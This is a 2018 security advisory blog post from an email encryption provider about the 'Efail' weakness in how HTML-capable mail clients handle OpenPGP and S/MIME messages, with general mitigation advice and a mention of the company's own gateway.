“Efail”: Email encryption can be insecure in combination with HTML mails

“Efail”: Email encryption can be insecure in combination with HTML mails

Researchers at Münster University of Applied Sciences have discovered a critical security gap in current email encryption solutions (OpenPGP, S/MIME). The “Süddeutsche Zeitung”, together with its investigation partners NDR and WDR, has published the most detailed report to date on the web (in German). However, the Münster researchers led by Sebastian Schinzel, Professor of Applied Cryptography, are not expected to publish details of the weak points until tomorrow. In our view, there is no reason to panic until the details are fully known.

The “Süddeutsche” article states:

The researchers’ attack is based on two conditions: First, they are in posession of the ciphertext. Second, HTML is allowed in the email program.

Important: OpenPGP and S/MIME are not fundamentally insecure; the problem lies in the handling of encrypted emails in HTML format by certain email clients and plug-ins. Companies that want to rule out any risk in the meantime therefore have the option of prohibiting HTML at least for incoming encrypted emails. Another precaution would be to temporarily disable plugins on client computers that automatically decrypt encrypted emails in the mail client. The US-based Electronic Frontier Foundation (EFF) have been advising this course of action.

More details can be found on the website efail.de. As a short-term measure to protect against “efail” attacks, the researchers recommend that the decryption of emails should no longer be carried out in the mail program, but separately elsewhere. This is exactly what happens with Retarus E-Mail Encryption customers: a separate gateway is used for decryption (the Münster researchers deal with the topic of gateways in their paper in Section 6.5). Just like our gateway manufacturer, we do of course continue to recommend – old hat from an IT security point of view – to prevent the downloading of HTML content from the net in the email client.

We will of course keep an eye on the issue and keep you posted about any important developments.

(Last updated on May 15, 2018 at 14:30)